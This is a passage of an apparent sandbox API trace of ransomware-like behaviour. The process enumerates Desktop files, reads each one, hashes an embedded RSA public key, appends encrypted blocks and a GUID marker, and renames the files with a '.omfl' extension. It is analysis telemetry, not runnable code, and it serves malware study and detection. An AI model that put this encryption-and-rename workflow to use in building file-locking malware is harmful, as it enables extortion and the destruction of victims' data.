lpNumberOfBytesWritten=0xe00fb14*=0x73ea, lpOverlapped=0x0) returned 1 [0130.333] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd2c688 | out: hHeap=0x4970000) returned 1 [0130.333] SetFilePointerEx (in: hFile=0x5c8, liDistanceToMove=0x73ef, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0130.333] WriteFile (in: hFile=0x5c8, lpBuffer=0xdd24260*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0xe00fb50, lpOverlapped=0x0 | out: lpBuffer=0xdd24260*, lpNumberOfBytesWritten=0xe00fb50*=0x100, lpOverlapped=0x0) returned 1 [0130.333] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd24260 | out: hHeap=0x4970000) returned 1 [0130.333] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x60) returned 0xdcf5f60 [0130.333] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x428) returned 0x757b558 [0130.333] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH", cchWideChar=-1, lpMultiByteStr=0x757b558, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH", lpUsedDefaultChar=0x0) returned 41 [0130.333] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x430) returned 0xdd19550 [0130.333] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x757b558 | out: hHeap=0x4970000) returned 1 [0130.333] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf5f60 | out: hHeap=0x4970000) returned 1 [0130.333] WriteFile (in: hFile=0x5c8, lpBuffer=0xdd19550*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0xe00fb50, lpOverlapped=0x0 | out: lpBuffer=0xdd19550*, lpNumberOfBytesWritten=0xe00fb50*=0x28, lpOverlapped=0x0) returned 1 [0130.333] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd19550 | out: hHeap=0x4970000) returned 1 [0130.333] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0130.333] WriteFile (in: hFile=0x5c8, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0xe00fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0xe00fb50*=0x26, lpOverlapped=0x0) returned 1 [0130.333] CloseHandle (hObject=0x5c8) returned 1 [0130.336] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x60) returned 0xdcf5f60 [0130.336] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x870) returned 0x7516fe8 [0130.336] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf5f60 | out: hHeap=0x4970000) returned 1 [0130.337] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\8TIQU.rtf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\8tiqu.rtf"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\8TIQU.rtf.omfl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\8tiqu.rtf.omfl")) returned 1 [0130.337] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0130.337] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb98 | out: hHeap=0x4970000) returned 1 [0130.338] VirtualFree (lpAddress=0x6ec0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0130.339] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf9d98 | out: hHeap=0x4970000) returned 1 [0130.339] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x88f991a0, ftCreationTime.dwHighDateTime=0x1d5e12e, ftLastAccessTime.dwLowDateTime=0x8b9f7eb0, ftLastAccessTime.dwHighDateTime=0x1d5e42b, ftLastWriteTime.dwLowDateTime=0x8b9f7eb0, ftLastWriteTime.dwHighDateTime=0x1d5e42b, nFileSizeHigh=0x0, nFileSizeLow=0x1892a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AYRewL ypknmdWOcSXu.avi", cAlternateFileName="AYREWL~1.AVI")) returned 1 [0130.339] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x50) returned 0x757c9b0 [0130.339] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x80) returned 0x49d3088 [0130.339] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x757c9b0 | out: hHeap=0x4970000) returned 1 [0130.339] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\AYRewL ypknmdWOcSXu.avi") returned=".avi" [0130.339] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\AYRewL ypknmdWOcSXu.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ayrewl ypknmdwocsxu.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5c8 [0130.339] GetFileSizeEx (in: hFile=0x5c8, lpFileSize=0xe00fb40 | out: lpFileSize=0xe00fb40*=100650) returned 1 [0130.339] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x6ec0000 [0130.342] SetFilePointerEx (in: hFile=0x5c8, liDistanceToMove=0x18904, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0130.342] ReadFile (in: hFile=0x5c8, lpBuffer=0x6ec0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0xe00fb78, lpOverlapped=0x0 | out: lpBuffer=0x6ec0000*, lpNumberOfBytesRead=0xe00fb78*=0x26, lpOverlapped=0x0) returned 1 [0130.343] SetFilePointer (in: hFile=0x5c8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0130.343] ReadFile (in: hFile=0x5c8, lpBuffer=0x6ec0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0xe00fb70, lpOverlapped=0x0 | out: lpBuffer=0x6ec0000*, lpNumberOfBytesRead=0xe00fb70*=0x1892a, lpOverlapped=0x0) returned 1 [0130.344] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0130.344] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x1ef) returned 0xdd0bd00 [0130.344] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0130.344] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0130.344] CryptAcquireContextW (in: phProv=0xe00fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0xe00fa50*=0x49d3198) returned 1 [0130.345] CryptCreateHash (in: hProv=0x49d3198, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0xe00fa58 | out: phHash=0xe00fa58) returned 1 [0130.345] CryptHashData (hHash=0xdce3a70, pbData=0xdd0bd00, dwDataLen=0x1ef, dwFlags=0x0) returned 1 [0130.345] CryptGetHashParam (in: hHash=0xdce3a70, dwParam=0x2, pbData=0x0, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0xe00fa54) returned 1 [0130.345] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x11) returned 0x74cdf28 [0130.346] CryptGetHashParam (in: hHash=0xdce3a70, dwParam=0x2, pbData=0x74cdf28, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x74cdf28, pdwDataLen=0xe00fa54) returned 1 [0130.346] GetLastError () returned 0x0 [0130.346] CryptDestroyHash (hHash=0xdce3a70) returned 1 [0130.346] CryptReleaseContext (hProv=0x49d3198, dwFlags=0x0) returned 1 [0130.346] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd0bd00 | out: hHeap=0x4970000) returned 1 [0130.346] UuidCreate (in: Uuid=0xe00fa48 | out: Uuid=0xe00fa48) returned 0x0 [0130.346] UuidToStringA (in: Uuid=0xe00fa48, StringUuid=0xe00fa40 | out: StringUuid=0xe00fa40) returned 0x0 [0130.346] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750cb60 [0130.346] RpcStringFreeA (in: String=0xe00fa40 | out: String=0xe00fa40) returned 0x0 [0130.346] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb98 | out: hHeap=0x4970000) returned 1 [0130.346] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750cb98 [0130.346] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x18930) returned 0xdd2c688 [0130.347] SetFilePointer (in: hFile=0x5c8, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0130.347] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb60 | out: hHeap=0x4970000) returned 1 [0130.347] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x1f0) returned 0xdd0bd00 [0130.347] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750cb60 [0130.347] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x1f0) returned 0x74e4b90 [0130.347] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x58) returned 0xdd08cc8 [0130.347] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x40) returned 0xdcf2c98 [0130.347] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16b00 [0130.348] RtlReAllocateHeap (Heap=0x4970000, Flags=0x0, Ptr=0xdcfae58, Size=0x218) returned 0xdce0a50 [0130.348] SetFilePointerEx (in: hFile=0x5c8, liDistanceToMove=0x1892a, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0130.348] WriteFile (in: hFile=0x5c8, lpBuffer=0xdd24260*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0xe00fb50, lpOverlapped=0x0 | out: lpBuffer=0xdd24260*, lpNumberOfBytesWritten=0xe00fb50*=0x100, lpOverlapped=0x0) returned 1 [0130.349] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd24260 | out: hHeap=0x4970000) returned 1 [0130.349] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0130.349] WriteFile (in: hFile=0x5c8, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0xe00fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0xe00fb50*=0x26, lpOverlapped=0x0) returned 1 [0130.349] CloseHandle (hObject=0x5c8) returned 1 [0130.351] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\AYRewL ypknmdWOcSXu.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ayrewl ypknmdwocsxu.avi"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\AYRewL ypknmdWOcSXu.avi.omfl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ayrewl ypknmdwocsxu.avi.omfl")) returned 1 [0130.352] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0130.352] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb98 | out: hHeap=0x4970000) returned 1 [0130.352] VirtualFree (lpAddress=0x6ec0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0130.354] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x49d3088 | out: hHeap=0x4970000) returned 1 [0130.354] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcc017160, ftCreationTime.dwHighDateTime=0x1d5e562, ftLastAccessTime.dwLowDateTime=0xa0ad8120, ftLastAccessTime.dwHighDateTime=0x1d5e328, ftLastWriteTime.dwLowDateTime=0xa0ad8120, ftLastWriteTime.dwHighDateTime=0x1d5e328, nFileSizeHigh=0x0, nFileSizeLow=0xfe4f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="cDgmdg3S1-bS-1.swf", cAlternateFileName="CDGMDG~1.SWF")) returned 1 [0130.354] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\cDgmdg3S1-bS-1.swf") returned=".swf" [0130.354] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\cDgmdg3S1-bS-1.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\cdgmdg3s1-bs-1.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5c8 [0130.354] GetFileSizeEx (in: hFile=0x5c8, lpFileSize=0xe00fb40 | out: lpFileSize=0xe00fb40*=65103) returned 1 [0130.354] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x6ec0000 [0130.357] SetFilePointerEx (in: hFile=0x5c8, liDistanceToMove=0xfe29, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0130.357] ReadFile (in: hFile=0x5c8, lpBuffer=0x6ec0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0xe00fb78, lpOverlapped=0x0 | out: lpBuffer=0x6ec0000*, lpNumberOfBytesRead=0xe00fb78*=0x26, lpOverlapped=0x0) returned 1 [0130.358] SetFilePointer (in: hFile=0x5c8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0130.358] ReadFile (in: hFile=0x5c8, lpBuffer=0x6ec0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0xe00fb70, lpOverlapped=0x0 | out: lpBuffer=0x6ec0000*, lpNumberOfBytesRead=0xe00fb70*=0xfe4f, lpOverlapped=0x0) returned 1 [0130.359] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0130.359] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0130.359] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0130.359] CryptAcquireContextW (in: phProv=0xe00fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0xe00fa50*=0x49d3198) returned 1 [0130.360] CryptCreateHash (in: hProv=0x49d3198, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0xe00fa58 | out: phHash=0xe00fa58) returned 1 [0130.360] CryptHashData (hHash=0xdce3a70, pbData=0xdd0bd00, dwDataLen=0x1ef, dwFlags=0x0) returned 1 [0130.360] CryptGetHashParam (in: hHash=0xdce3a70, dwParam=0x2, pbData=0x0, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0xe00fa54) returned 1 [0130.361] CryptGetHashParam (in: hHash=0xdce3a70, dwParam=0x2, pbData=0x74cdf28, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x74cdf28, pdwDataLen=0xe00fa54) returned 1 [0130.361] GetLastError () returned 0x0 [0130.361] CryptDestroyHash (hHash=0xdce3a70) returned 1 [0130.361] CryptReleaseContext (hProv=0x49d3198, dwFlags=0x0) returned 1 [0130.361] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd0bd00 | out: hHeap=0x4970000) returned 1 [0130.361] UuidCreate (in: Uuid=0xe00fa48 | out: Uuid=0xe00fa48) returned 0x0 [0130.361] UuidToStringA (in: Uuid=0xe00fa48, StringUuid=0xe00fa40 | out: StringUuid=0xe00fa40) returned 0x0 [0130.361] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750cb60 [0130.361] RpcStringFreeA (in: String=0xe00fa40 | out: String=0xe00fa40) returned 0x0 [0130.361] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb98 | out: hHeap=0x4970000) returned 1 [0130.361] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750cb98 [0130.361] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xfe50) returned 0xdd2c688 [0130.361] SetFilePointer (in: hFile=0x5c8, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0130.362] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb60 | out: hHeap=0x4970000) returned 1 [0130.362] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x1f0) returned 0xdd0bd00 [0130.362] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750cb60 [0130.362] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x1f0) returned 0x74e4b90 [0130.362] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x58) returned 0xdd08de8 [0130.362] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x40) returned 0xdcf2db8 [0130.362] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16b18 [0130.362] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x40) returned 0xdcf2e00 [0130.362] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16b30 [0130.362] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16b60 [0130.362] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16a40 [0130.362] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16b78 [0130.362] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x24) returned 0xdd0d930 [0130.362] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x158) returned 0xdcfae58 [0130.362] RtlReAllocateHeap (Heap=0x4970000, Flags=0x0, Ptr=0xdcfae58, Size=0x218) returned 0xdce0a50 [0130.362] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x558) returned 0xdce69c8 [0130.362] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16b60 | out: hHeap=0x4970000) returned 1 [0130.362] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16b78 | out: hHeap=0x4970000) returned 1 [0130.362] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16a40 | out: hHeap=0x4970000) returned 1 [0130.362] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd0d930 | out: hHeap=0x4970000) returned 1 [0130.362] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce69c8 | out: hHeap=0x4970000) returned 1 [0130.362] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16a40 [0130.362] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8) returned 0x7481e38 [0130.362] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10) returned 0xdd16b78 [0130.362] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x18) returned 0x74cf068 [0130.362] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x9) returned 0xdd16b60 [0130.362] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8) returned 0x7481e78 [0130.362] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10e) returned 0x74e3210 [0130.363] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9278 [0130.363] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x58) returned 0xdd08cc8 [0130.363] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x14) returned 0x74cdf28 [0130.363] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x104) returned 0x7503670 [0130.363] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x14) returned 0x74cdb88 [0130.363] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e58 [0130.363] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74e3210 | out: hHeap=0x4970000) returned 1 [0130.363] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16b78 | out: hHeap=0x4970000) returned 1 [0130.363] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e78 | out: hHeap=0x4970000) returned 1 [0130.363] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16b60 | out: hHeap=0x4970000) returned 1 [0130.363] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74cf068 | out: hHeap=0x4970000) returned 1 [0130.363] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e38 | out: hHeap=0x4970000) returned 1 [0130.363] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16a40 | out: hHeap=0x4970000) returned 1 [0130.363] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9278 | out: hHeap=0x4970000) returned 1 [0130.363] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd08de8 | out: hHeap=0x4970000) returned 1 [0130.363] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce0a50 | out: hHeap=0x4970000) returned 1 [0130.363] GetCurrentThreadId () returned 0x618 [0130.363] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x100) returned 0xdd24260 [0130.363] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x82) returned 0x49d5860 [0130.363] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x2c) returned 0x750cb28 [0130.363] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x80) returned 0x49d3198 [0130.363] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x148) returned 0x49c5028 [0130.363] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e38 [0130.363] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e78 [0130.363] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x100) returned 0xdd24368 [0130.363] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0130.363] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0130.363] GetCurrentThreadId () returned 0x618 [0130.363] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0130.363] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0130.364] RtlAllocateHeap 